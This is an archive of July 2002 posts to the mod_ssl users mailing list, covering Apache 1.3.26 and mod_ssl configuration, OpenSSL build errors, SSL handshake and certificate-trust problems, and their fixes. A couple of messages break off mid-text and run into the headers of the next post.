User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 14 23:19:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA09315; Sun, 14 Jul 2002 23:18:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hollo.idg.hu id XAA09282; Sun, 14 Jul 2002 23:17:49 +0200 (MET DST)
Received: by hollo.idg.hu (Postfix, from userid 1000)
	id 0212B1F; Sun, 14 Jul 2002 23:30:05 +0200 (CEST)
Date: Sun, 14 Jul 2002 23:30:05 +0200
From: Deim Agoston 
To: modssl-users@modssl.org
Subject: Apache 1.3.26+mod_ssl 2.8.9 + vhost problem
Message-ID: <20020714213005.GA30050@idg.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Deim Agoston 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello!

I've got problems using $SUBJECT together. System is:
- Debian Woody, security upgraded Apache and mod_ssl
- related packeges:
ii  apache         1.3.26-0woody1 Versatile, high-performance HTTP server
ii  apache-common  1.3.26-0woody1 Support files for all Apache webservers
ii  libapache-mod- 1.0.3-3        A DAV module for Apache
ii  libapache-mod- 2.8.9-2        Strong cryptography (HTTPS support) for Apac

I can't live without SSL because I provide file upload to virtual hosts
via DAV, and don't want that somebody sniff one of my user's passwd.
Don't complain: they are not able to use SSL keys so I can't authenticate
them in ths way. So I need SSL.

What happens when I have all modules enabled:
[Mon Jul 15 00:21:52 2002] [error] mod_ssl: Init: (www.xy.hu:80) Illegal attempt to re-initialise SSL for server (theoretically shouldn't happen!)

Related directives:

Listen 443 (previously 30443 packets redirected via ipchains/iptables = it
wasn't necessary to start is as root)
Listen 80 (prev.: 30080)

BindAddress *

LoadModule vhost_alias_module /usr/lib/apache/1.3/mod_vhost_alias.so
LoadModule access_module /usr/lib/apache/1.3/mod_access.so
LoadModule auth_module /usr/lib/apache/1.3/mod_auth.so
LoadModule dav_module /usr/lib/apache/1.3/libdav.so
LoadModule ssl_module /usr/lib/apache/1.3/mod_ssl.so

Port 80 (Previously 30080)

ServerName T.X.Y.Z (numeric IPv4 address)

DocumentRoot /var/www/


  Options SymLinksIfOwnerMatch
  AllowOverride None




   Options Includes FollowSymLinks MultiViews
   AllowOverride None
   Order allow,deny
   Allow from all


SSLEngine on
SSLCACertificateFile conf/ssl.crt/ca.crt
SSLCertificateKeyFile conf/ssl.key/server.key
SSLCertificateFile conf/ssl.crt/server.crt
SSLLog  /var/log/apache/ssl_log
SSLLogLevel warn

NameVirtualHost T.X.Y.Z:80
Include virt/

In directory virt:
virtserver1.conf
virtserver2.conf etc.

Example virtserver (only the name and IP address removed):


ServerName www.domainname.hu
ServerAdmin tech@domainname.hu
DocumentRoot /var/www/virtuals/domainname/html



AllowOverride AuthConfig FileInfo Limit
Options FollowSymLinks


Any ideas? I've seen a similar thread in the archives without the answer.
Thanks,
Ago
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 00:12:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA10917; Mon, 15 Jul 2002 00:11:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hollo.idg.hu id AAA10904; Mon, 15 Jul 2002 00:10:59 +0200 (MET DST)
Received: by hollo.idg.hu (Postfix, from userid 1000)
	id E34881F; Mon, 15 Jul 2002 00:23:26 +0200 (CEST)
Date: Mon, 15 Jul 2002 00:23:26 +0200
From: Deim Agoston 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26+mod_ssl 2.8.9 + vhost problem
Message-ID: <20020714222326.GA31261@idg.hu>
References: <20020714213005.GA30050@idg.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020714213005.GA30050@idg.hu>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Deim Agoston 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, Jul 14, 2002 at 11:30:05PM +0200, Deim Agoston  wrote:
OK, it's solved. For the sake of archive, here it is:
- don't write SSLEngine into the main server config - use a virtualhost
for this directive
- create the virtualhost you want use for the purpose to access it
via HTTPS
A simple config file looks like this (with real names):

ServerName webadmin.lsc.hu
ServerAdmin root@webadmin.lsc.hu
DocumentRoot /var/www/webadmin/

#SSL beallitasok
SSLEngine on
SSLCACertificateFile conf/ssl.crt/ca.crt
SSLCertificateKeyFile conf/ssl.key/server.key
SSLCertificateFile conf/ssl.crt/server.crt
SSLLog /var/log/apache/ssl_log
SSLLogLevel warn


Bye,
Ago
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 00:44:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA12156; Mon, 15 Jul 2002 00:43:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from priv-edtnes27.telusplanet.net id AAA12120; Mon, 15 Jul 2002 00:42:21 +0200 (MET DST)
Received: from billhome ([216.232.79.183]) by priv-edtnes27.telusplanet.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP
          id <20020714224214.EAWN589.priv-edtnes27.telusplanet.net@billhome>
          for ; Sun, 14 Jul 2002 16:42:14 -0600
Message-ID: <003f01c22b88$1742b6f0$b74fe8d8@billhome>
From: "Bill Angus" 
To: 
Subject: compile of openssl-0.9.6d stops
Date: Sun, 14 Jul 2002 15:44:59 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_003C_01C22B4D.69029BD0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bill Angus" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_003C_01C22B4D.69029BD0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi: Thanks all for earlier help to compile Apache and openssl-0.9.6d =
under Windows. I found awk and got it installed which made things a lot =
better :-o) I think I'm well on my to getting the project to compile =
using Microsoft Visual C++ v.6 and MASM, but I ran into a slight glitch. =


I followed the directions as best I could to compile form the command =
line, and managed to get the project about half compiled before I ran =
into the problem listed below. Compilation fails after what seems to be =
about 50% completion and the compilers throws up the following error box =
(see below)... Any ideas?

The compilation seemed to be proceeding real well up to this point.=20

-------------------------------------------------------------------------=
-------

ERROR MESSAGE BOX APPEARS AND TERMINATES COMPILATION (funny spelling =
...CompuuerName... I was unable to find where it came from.)

cmd.exe entry point not found
The procedure entry point RtlDnsHostNameToCompuuerName could not be =
located in the dynamic link library NTDLL.DLL

-------------------------------------------------------------------------=
-------

THE MAKEFILE COMMAND BEING EXECUTED WHEN COMPILATION FAILURE OCCURS WAS =
AS BELOW:

cl /Fotmp32dllx509_cmp.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5 /Ox /O2 =
/Ob2 /Gs0 /GF /Gy /nologo -D_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN =
-DSO_WIN32 -DBN_ASM -DSHA1_ASM -DRMD160_ASM /Fdout32dll /GD -D_WINDLL =
-D_DLL -c .\crypto\x509_cmp.c
nmake : fatal error U1077: 'cl' : return code '0x80'
Stop.

-------------------------------------------------------------------------=
-------

Bill Angus
http://www.psychtest.com

------=_NextPart_000_003C_01C22B4D.69029BD0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi: Thanks all for earlier help to =
compile Apache and openssl-0.9.6d under =
Windows. I found=20
awk and got it installed which made things a lot better :-o) I =
think I'm=20
well on my to getting the project to compile using Microsoft Visual C++ =
v.6 and=20
MASM, but I ran into a slight glitch. 


 


I followed the directions as best I =
could to=20
compile form the command line, and managed to get the project about half =

compiled before I ran into the problem listed below. Compilation fails after what seems =
to be about=20
50% completion and the compilers throws up the following error box (see=20
below)... Any ideas?




 


The compilation seemed to be proceeding =
real well=20
up to this point. 








ERROR MESSAGE BOX APPEARS AND =
TERMINATES=20
COMPILATION (funny spelling ...CompuuerName... I was unable to find =
where=20
it came from.)


 


cmd.exe entry point not =

found


The procedure entry =
point=20
RtlDnsHostNameToCompuuerName could not be located in the dynamic link =
library=20
NTDLL.DLL








THE MAKEFILE COMMAND BEING EXECUTED =
WHEN=20
COMPILATION FAILURE OCCURS WAS AS BELOW:


 


cl=20
/Fotmp32dllx509_cmp.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5 /Ox /O2 =
/Ob2=20
/Gs0 /GF /Gy /nologo -D_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN =
-DSO_WIN32=20
-DBN_ASM -DSHA1_ASM -DRMD160_ASM /Fdout32dll /GD -D_WINDLL -D_DLL=20
-c .\crypto\x509_cmp.c


nmake : fatal error =
U1077: 'cl' :=20
return code '0x80'


Stop.








Bill Angus
http://www.psychtest.com


------=_NextPart_000_003C_01C22B4D.69029BD0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 06:39:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA09840; Mon, 15 Jul 2002 06:38:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fep.internode.on.net id GAA09822; Mon, 15 Jul 2002 06:38:17 +0200 (MET DST)
Received: from zebedee (eth1751.sa.adsl.internode.on.net [150.101.235.214])
	by fep.internode.on.net (8.12.4/8.12.4) with SMTP id g6F0ZXSP057122
	for ; Mon, 15 Jul 2002 10:05:34 +0930 (CST)
From: "Glen Vallance" 
To: 
Subject: FreeBSD SSL_Connect drama
Date: Mon, 15 Jul 2002 10:05:33 +0930
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Glen Vallance" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

This problem doesn't sound like it should be that uncommon, but I can't find
any information on it.

Environment:  FreeBSD 4.4, Apache 1.3.24, Mod SSL 2.8.8-1.3.24 [the right
one?]
Behaviour:  "You cannot connect to sol.gropep.com.au because of an unknown
SSL error [-12281]"

Looking at the situation with openssl s_client I get:

sol# openssl s_client -connect sol.gropep.com.au:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0808D4C0 [0809E000] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 66 47 70 ab   ............fGp.
0060 - 9a 01 13 69 a4 cb 78 16-98 f8 35 5e 7b 24 7a d0   ...i..x...5^{$z.
0070 - a7 fa 83 48 6a bf 36 32-a3 3e 3f 8d               ...Hj.62.>?.
SSL_connect:SSLv2/v3 write client hello A
read from 0808D4C0 [080A4000] (7 bytes => 7 (0x7))
0000 - 0d 0a 0d 0a 3c 21 44                              ....
	from troy.barwonwater.vic.gov.au id IAA13091; Mon, 15 Jul 2002 08:06:24 +0200 (MET DST)
Received: from barwonwater.vic.gov.au (matrix.is.barwonwater.vic.gov.au [138.19.9.83])
	by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id QAA16761
	for ; Mon, 15 Jul 2002 16:06:12 +1000 (EST)
Message-ID: <3D326652.50704@barwonwater.vic.gov.au>
Date: Mon, 15 Jul 2002 16:06:10 +1000
From: Christopher Welsh 
Organization: Barwon Water
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: CCT issues with netscape and mod_ssl Urgent - On our production system.
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Welsh 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,


I'm getting the following errors with netscape v 6.2.3 and 7 pre when 
ssl connecting to my web server.



There is a problem with the cct that identifies 
www.bawonwater.vic.gov.au do you want to continue?

The certificate was issued by a certificate authority that netscape 
6.2.3 does not recognize.


Can anyone help? I need to resolve this quickly. I'm sure this was not 
happening before I upgraded to 1.3.26 with x.x.10 mod_ssl when the 
security alert came out. Perhaps I missed something when I performed a 
make install over the top of the old version.

-- 
Christopher Welsh
Barwon Regional Water Authority,
Geelong Victoria, 3216
Voice: 03 52 262385, Mobile: 0409 562968



*********************************************************************************************


The information in this e-mail message and any files transmitted with it
are confidential
and/or privileged and are intended only for the use of the individual or
entity to whom
they are addressed.  If you received this message in error please notify us
immediately
by telephone or return e-mail and delete all copies from your computer
system, as your
retention, distribution or copying of this message and files is strictly
prohibited.

It is the recipient's responsibility to check this message and files for
viruses.

***********************************************************************************************


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 08:37:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA14451; Mon, 15 Jul 2002 08:36:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mag06.bb.admin.ch id IAA14434; Mon, 15 Jul 2002 08:35:45 +0200 (MET DST)
From: Michael.Straessle@bk.admin.ch
Received: from mar01.bb.admin.ch (mar01.bb.admin.ch [193.5.222.71])
	by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g6F6Zjo20293
	for ; Mon, 15 Jul 2002 08:35:45 +0200 (METDST)
Received: from mas22.bb.admin.ch (mas22.bb.admin.ch [193.5.222.83])
	by mar01.bb.admin.ch (8.11.2/8.11.2) with SMTP id g6F6ZiC24578
	for ; Mon, 15 Jul 2002 08:35:44 +0200 (METDST)
Received: by ad01008exc.ad.admin.ch with Internet Mail Service (5.5.2653.19)
	id <39KAYTBK>; Mon, 15 Jul 2002 08:35:44 +0200
Message-ID: 
To: modssl-users@modssl.org
Subject: RE: mod ssl for windows
Date: Mon, 15 Jul 2002 08:35:38 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael.Straessle@bk.admin.ch
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

...this _does_ work with mod_jserv, as long as it's compiled with -DEAPI.
binaries are available in the modssl contributions section.
rgds
michael

> -----Ursprungliche Nachricht-----
> Von: Noah White [mailto:nwhite@silverbacktech.com]
> Gesendet: Donnerstag, 11. Juli 2002 16:40
> An: 'modssl-users@modssl.org'
> Betreff: RE: mod ssl for windows
> 
> 
> 
> Just as an FYI. This does not work with mod_jserv.
> 
> > -----Original Message-----
> > From: JOURDAIN Philippe [mailto:P.JOURDAIN@gip-cps.fr]
> > Sent: Thursday, July 11, 2002 10:41 AM
> > To: modssl-users@modssl.org
> > Subject: RE: mod ssl for windows
> > 
> > 
> > 
> http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-Ope
nSSL_0.9.6d-
> Wi
> n32.zip
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 08:46:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA14794; Mon, 15 Jul 2002 08:45:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id IAA14763; Mon, 15 Jul 2002 08:44:22 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6F6gdX2006159
	for ; Mon, 15 Jul 2002 02:42:39 -0400
Date: Mon, 15 Jul 2002 02:42:38 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: CCT issues with netscape and mod_ssl Urgent - On our production
 system.
In-Reply-To: <3D326652.50704@barwonwater.vic.gov.au>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 15 Jul 2002, Christopher Welsh wrote:

> The certificate was issued by a certificate authority that netscape
> 6.2.3 does not recognize.
>
> Can anyone help? I need to resolve this quickly. I'm sure this was not
> happening before I upgraded to 1.3.26 with x.x.10 mod_ssl when the
> security alert came out. Perhaps I missed something when I performed a
> make install over the top of the old version.

You seem to now be using an invalid (possibly self-signed?) server
certificate.  Did you run "make certificate" by chance?  You shouldn't
have.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 09:10:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA15794; Mon, 15 Jul 2002 09:09:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from troy.barwonwater.vic.gov.au id JAA15723; Mon, 15 Jul 2002 09:09:03 +0200 (MET DST)
Received: from barwonwater.vic.gov.au (matrix.is.barwonwater.vic.gov.au [138.19.9.83])
	by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id RAA18685
	for ; Mon, 15 Jul 2002 17:08:54 +1000 (EST)
Message-ID: <3D327507.3000101@barwonwater.vic.gov.au>
Date: Mon, 15 Jul 2002 17:08:55 +1000
From: Christopher Welsh 
Organization: Barwon Water
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: CCT issues with netscape and mod_ssl Urgent - On our production
 system.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Welsh 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Cliff,

Here is what I did. Any ideas what I can do to quickly  fix it?


On 1.3.24 I ran make certificate TYPE=custom, and sent the csr off to 
esign be signed, but not this time because I wanted to keep the keys 
esigned keys.


Not so funny thing is that it is that ALL is well when I get there on 
MSIE browsers. ????




cd apache_1.3.26
  cd ../../mod_ssl
  gunzip mod_ssl-2.8.10-1.3.26.tar.gz
  tar -vxf mod_ssl-2.8.10-1.3.26.tar
  cd mod_ssl-2.8.10-1.3.26
  make clean
  less INSTALL # Read the INSTALL file
  cd ../../openssl/openssl-0.9.6b
  make clean
  # Used gcc. Gcc supports position independant code flag.
  ./Configure no-threads solaris-sparcv9-gcc -fPIC
  make
  make test
  cd ../../mm/mm-1.1.3
  ./configure  --disable-shared
  make
  cd ../../mod_ssl/mod_ssl-2.8.10-1.3.26
  # --enable-rule=SHARED_CORE
  ./configure --with-apache=../../apache/apache_1.3.26
  cd ../../apache/apache_1.3.26
  env LIBS=/usr/lib/libC.so.5 CFLAGS=-fPIC 
SSL_BASE=../../openssl/openssl-0.9.6b
 ./configure --enable-module=ssl --enable-module=so --enable-shared=ssl 
--enable
-module=rewrite --prefix=/opt/apache --runtimedir=/var/opt/apache 
--logfiledir=/
var/opt/apache
  make
make install

# ls -l ssl.crt
total 548
lrwxrwxrwx   1 root     root          19 Jul  1 17:16 0cf14d7d.0 -> 
snakeoil-ca-dsa.crt
lrwxrwxrwx   1 root     root           6 Jul  1 17:16 27c9619a.0 -> ca.crt
lrwxrwxrwx   1 root     root          16 Jul  1 17:16 5d8360e1.0 -> 
snakeoil-dsa.crt
lrwxrwxrwx   1 root     root          16 Jul  1 17:16 82ab5372.0 -> 
snakeoil-rsa.crt
-rw-r--r--   1 root     root        1522 Feb 27 16:53 Makefile
-rw-r--r--   1 root     root        1386 Feb 27 16:53 README.CRT
lrwxrwxrwx   1 root     root          10 Jul  1 17:16 c5f0b2a4.0 -> 
server.crt
-r--------   1 root     root      242153 Feb 27 16:53 ca-bundle.crt
-r--------   1 root     root        1318 Feb 27 16:54 ca.crt
lrwxrwxrwx   1 root     root          19 Jul  1 17:16 e52d41d0.0 -> 
snakeoil-ca-rsa.crt
-r--------   1 root     root        1874 Feb 28 12:05 server.crt
-r--------   1 root     root        1874 Feb 28 09:15 server.crt.esign
-r--------   1 root     root        1298 Feb 27 16:54 server.crt.orig
-r--------   1 root     root        1472 Feb 27 16:54 snakeoil-ca-dsa.crt
-r--------   1 root     root        1192 Feb 27 16:53 snakeoil-ca-rsa.crt
-r--------   1 root     root        1452 Feb 27 16:54 snakeoil-dsa.crt
-r--------   1 root     root        1176 Feb 27 16:54 snakeoil-rsa.crt




Cliff Woolley wrote:

>On Mon, 15 Jul 2002, Christopher Welsh wrote:
>
>  
>
>>The certificate was issued by a certificate authority that netscape
>>6.2.3 does not recognize.
>>
>>Can anyone help? I need to resolve this quickly. I'm sure this was not
>>happening before I upgraded to 1.3.26 with x.x.10 mod_ssl when the
>>security alert came out. Perhaps I missed something when I performed a
>>make install over the top of the old version.
>>    
>>
>
>You seem to now be using an invalid (possibly self-signed?) server
>certificate.  Did you run "make certificate" by chance?  You shouldn't
>have.
>
>--Cliff
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>

-- 
Christopher Welsh
Barwon Regional Water Authority,
Geelong Victoria, 3216
Voice: 03 52 262385, Mobile: 0409 562968



*********************************************************************************************


The information in this e-mail message and any files transmitted with it
are confidential
and/or privileged and are intended only for the use of the individual or
entity to whom
they are addressed.  If you received this message in error please notify us
immediately
by telephone or return e-mail and delete all copies from your computer
system, as your
retention, distribution or copying of this message and files is strictly
prohibited.

It is the recipient's responsibility to check this message and files for
viruses.

***********************************************************************************************



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 15 09:46:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18076; Mon, 15 Jul 2002 09:45:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id JAA18016; Mon, 15 Jul 2002 09:44:20 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 7BAFC2F00
	for ; Mon, 15 Jul 2002 09:44:19 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id EC2B02F01; Mon, 15 Jul 2002 09:44:16 +0200 (METDST)
Date: Mon, 15 Jul 2002 09:44:16 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: FreeBSD SSL_Connect drama
Message-ID: <20020715074416.GD14501@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Jul 15, 2002 at 10:05:33AM +0930, Glen Vallance wrote:
> This problem doesn't sound like it should be that uncommon, but I can't find
> any information on it.

Once you saw the solution you will find, that the mailing list is full
of problems like these.

> read from 0808D4C0 [080A4000] (7 bytes => 7 (0x7))
> 0000 - 0d 0a 0d 0a 3c 21 44                              .... SSL_connect:error in SSLv2/v3 read server hello A
> 36827:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:/usr/s
> rc/secure/lib/libssl/../../../crypto/openssl/crypto/../ssl/s23_clnt.c:462:
> 
> Something is wrong with the configuration?

Yes.

0d 0a 0d 0a 3c 21 44

carriage return
linefeed
carriage return
linefeed

	from ns0b.swx.com id JAA18455; Mon, 15 Jul 2002 09:50:58 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id JAA18934
	for ; Mon, 15 Jul 2002 09:50:51 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA15307
	for ; Mon, 15 Jul 2002 09:50:51 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: I am having a heck of a time - Please help.
Date: Mon, 15 Jul 2002 09:50:50 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA91CB@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: I am having a heck of a time - Please help.
Thread-Index: AcIqFu1VGd4SMnNRRv29DWgXfexRGABvSTXQ
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA18477
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Could be to do with your version of openssl lib (check it is reasonably up to date) or with your LD_LIBRARY_PATH environment variable..

Check out http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html

for a good user's summary.

Rgds,

Owen Boyle

>-----Original Message-----
>From: David Loesche [mailto:DLoesche@yipes.com]
>Sent: Freitag, 12. Juli 2002 20:12
>To: 'modssl-users@modssl.org'
>Subject: I am having a heck of a time - Please help.
>
>
>I have poured through all the documentation I can find on 
>enabling mod_ssl
>with Apache 1.3.26 but keep coming up short.  If I static link 
>the mod_ssl
>it works fine but when I try to enable DSO and use it as a 
>shared library I
>keep getting ap_add_config_define : referenced symbol not 
>found.  I have the
>following config setup for the apache build:
>
>#!/bin/ksh
>SSL_BASE=/usr/local/ssl \
>EAPI_MM=../mm-1.1.3 \
>EAPI_MM_CORE_PATH=logs/httpd.mm \
>LIBS=/usr/lib/libC.so.5 \
>CFLAGS=-fPIC \
>./configure	--prefix=/opt/apache \
>		--enable-rule=EAPI \
>		--enable-module=ssl \
>		--enable-shared=ssl \
>		--disable-rule=SSL_COMPAT \
>		--enable-rule=SSL_SDBM \
>		--enable-suexec \
>		--suexec-caller=http
>
>I have followed the instructions in the modssl install guide to patch
>Apache.  Please verify the following build for mod_ssl:
>
>./configure	--with-apache=../apache_1.3.26 \
>		--with-ssl=/usr/local/ssl \
>		--with-mm=../mm-1.1.3
>
>If you can help (point me to some documentation) I would be 
>very grateful...
>
>
>David S. Loesche
>david.loesche@yipes.com			Yipes 
>Communications, Inc.
>Main: 	(415) 901-2000 			114 Sansome Street, Suite 1045
>Direct: 	(415) 901-2210			San Francisco, CA 94104
